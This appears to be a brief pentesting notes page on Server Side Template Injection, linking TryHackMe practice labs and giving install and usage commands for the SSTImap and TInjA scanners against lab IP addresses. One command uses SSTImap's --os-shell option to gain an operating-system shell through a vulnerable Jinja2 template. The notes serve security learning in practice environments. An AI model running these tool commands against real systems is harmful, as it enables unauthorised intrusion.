# SSTI Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine. ### Playground * [**THM: SSTI**](https://tryhackme.com/r/room/learnssti) * [**Template Injection Playground**](https://github.com/Hackmanit/template-injection-playground) ### **Identification**

Quick Identification

[**Template Injection Table**](https://github.com/Hackmanit/template-injection-table) ### **Tools** **SSTImap** ```bash ## Install git clone https://github.com/vladko312/SSTImap cd SSTImap python3 -m venv sstimap_env source sstimap_env/bin/activate Usage: python3 sstimap.py --help python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2 python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2 --os-shell ```

SSTImap

**TInjA – the Template INJection Analyzer** * ```bash tinja url -u "http://10.10.242.241:5000/vuln?name=a" ```

TInjA – the Template INJection Analyzer

### Resources * *